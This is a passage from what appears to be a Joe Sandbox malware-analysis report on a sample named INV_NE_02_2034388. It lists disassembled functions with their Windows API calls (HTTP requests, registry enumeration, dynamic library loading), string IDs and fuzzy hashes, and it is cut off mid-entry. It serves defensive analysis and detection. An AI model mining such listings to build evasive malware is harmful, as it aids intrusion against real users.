                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memset$_memmove
                                          • String ID: 3cA$ERCP
                                          • API String ID: 2532777613-1471582817
                                          • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                          • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                                          • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                          • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                                          Function 00462753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 004627C0
                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                          • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                          • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                          • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                          Function 0047D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                            • Part of subcall function 0040784B: _memmove.LIBCMT ref: 00407899
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharLower_memmove
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 3425801089-567219261
                                          • Opcode ID: 85bf6583a6d5216460642c634f58536033cb8f756531c513cb924ba6ba7dc0f0
                                          • Instruction ID: 0be9701992b4b91cd2e68042300235638f00ad80fed84879f118ea648425d64e
                                          • Opcode Fuzzy Hash: 85bf6583a6d5216460642c634f58536033cb8f756531c513cb924ba6ba7dc0f0
                                          • Instruction Fuzzy Hash: 783191719142159BCF00EF55CC919EEB3B4FF14324B108A2BE839A76D2DB39AD05CB95
                                          Function 00458E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$_memmove$ClassName
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 365058703-1403004172
                                          • Opcode ID: 5616a381d2a6c22893b6373ffe679699cd493d48246bdb2e94df39414b209154
                                          • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                          • Opcode Fuzzy Hash: 5616a381d2a6c22893b6373ffe679699cd493d48246bdb2e94df39414b209154
                                          • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                          Function 0047182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00471872
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004718A2
                                          • InternetCloseHandle.WININET(00000000), ref: 004718E9
                                            • Part of subcall function 00472483: GetLastError.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 00472498
                                            • Part of subcall function 00472483: SetEvent.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 004724AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                          • String ID:
                                          • API String ID: 3113390036-3916222277
                                          • Opcode ID: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
                                          • Instruction ID: 9f195ba99928d8c49214c982579914efbee4b11eb605a7749f470a37591c6317
                                          • Opcode Fuzzy Hash: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
                                          • Instruction Fuzzy Hash: 1021B3B15002087FE711AF65DC85EFF77EDEB48748F10812FF44992250DA688D0957AA
                                          Function 004863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                            • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                            • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                          • LoadLibraryW.KERNEL32(?), ref: 00486468
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                          • DestroyWindow.USER32(?), ref: 00486485
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                          • String ID: SysAnimate32
                                          • API String ID: 4146253029-1011021900
                                          • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                          • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                          • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                          • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                          Function 00466D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                          • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                          • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                          • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                          Function 00466E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                          • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                          • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                          • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                          Function 0046AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                          • __swprintf.LIBCMT ref: 0046ACC1
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu
                                          • API String ID: 3164766367-685833217
                                          • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                          • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                          • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                          • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                          Function 00461142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID: @F
                                          • API String ID: 2875609808-2781531706
                                          • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                          • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                          • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                          • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                          Function 0047EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                          • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                          • String ID:
                                          • API String ID: 2364364464-0
                                          • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                          • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                          • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                          • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                          Function 0042541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                          • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                                          • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                          • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                                          Function 00480037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                          • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                          • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3440857362-0
                                          • Opcode ID: 359206fcd8379e0793ee5fe764a6f8573afec8092144811008bc698b7cf463b9
                                          • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                          • Opcode Fuzzy Hash: 359206fcd8379e0793ee5fe764a6f8573afec8092144811008bc698b7cf463b9
                                          • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                          Function 0047D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047D927
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0047D9AA
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0047D9C6
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0047DA07
                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047DA21
                                            • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                            • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                          • String ID:
                                          • API String ID: 327935632-0
                                          • Opcode ID: 06879a4796fb006db6701dcbeb08c84373d42f215ecc0ca78cf9e4c751ad0c13
                                          • Instruction ID: 2e87ffb2dc156b6f817890f7ff3d29c7ed6bd27adfaf25e4966d104b6097512d
                                          • Opcode Fuzzy Hash: 06879a4796fb006db6701dcbeb08c84373d42f215ecc0ca78cf9e4c751ad0c13
                                          • Instruction Fuzzy Hash: C6512A75A00205DFCB00EFA9C4849AEB7B4FF09324B14C06AE959AB352D739AD45CF59
                                          Function 0046E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
